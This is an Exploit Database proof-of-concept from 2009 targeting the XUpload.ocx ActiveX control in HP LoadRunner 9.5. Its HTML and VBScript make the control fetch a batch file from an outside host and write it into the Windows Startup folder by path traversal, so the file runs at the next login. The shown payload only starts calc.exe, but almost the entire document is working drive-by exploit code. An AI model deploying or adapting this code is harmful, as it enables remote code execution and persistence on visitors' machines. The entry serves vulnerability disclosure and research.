HP LoadRunner 9.5 - Remote file creation (PoC)

EDB-ID:

9806


Type:

dos


Platform:

Windows

Date:

2009-09-29


<!--
HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc
(IE 8)
by Nine:Situations:Group::pyrokinesis

CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003}
Progid: Persits.XUpload.2
Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<html>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' />
</object>
<script language='vbscript'>

' http://retrogod.altervista.org/sh_9232.txt , a batch script that starts calc.exe
XUPLOADLib.Server = "retrogod.altervista.org"
XUPLOADLib.Script = "sh_9232.txt"

' place it in the Startup folder, italian path, change for your os
Method=""
Params=""
Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd"
UserAgent=""
Headers=""
XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers
</script>